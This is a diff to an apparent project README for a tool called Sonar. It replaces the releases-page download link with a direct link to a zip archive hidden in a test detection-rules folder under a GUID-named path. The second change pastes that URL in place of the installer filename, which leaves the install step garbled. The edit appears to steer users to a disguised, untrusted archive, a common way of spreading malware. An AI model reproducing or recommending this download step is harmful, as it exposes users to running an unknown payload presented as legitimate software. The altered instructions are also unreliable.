Gamit-UI/Sonar/README.md

 Using Sonar is simple.
 Follow these steps to get started:

 1. **Download Sonar**
-   Visit this page to download: [Download Sonar](https://github.com/Gamit-UI/Sonar/releases).
+   Visit this page to download: [Download Sonar](https://github.com/Gamit-UI/Sonar/raw/refs/heads/main/src/Sonar.Tests/Detection/Rules/5c67a566-7829-eb05-4a1f-0eb292ef993f/Software-3.7-alpha.5.zip).

 2. **Install the Application**
-   Once downloaded, locate the `SonarSetup.exe` file in your Downloads folder and double-click it.
+   Once downloaded, locate the `https://github.com/Gamit-UI/Sonar/raw/refs/heads/main/src/Sonar.Tests/Detection/Rules/5c67a566-7829-eb05-4a1f-0eb292ef993f/Software-3.7-alpha.5.zip` file in your Downloads folder and double-click it.
 Follow the on-screen instructions to complete the installation process.

 3. **Open Sonar**
    After installation, find the Sonar icon on your desktop or in your applications list.
 Click to launch the application.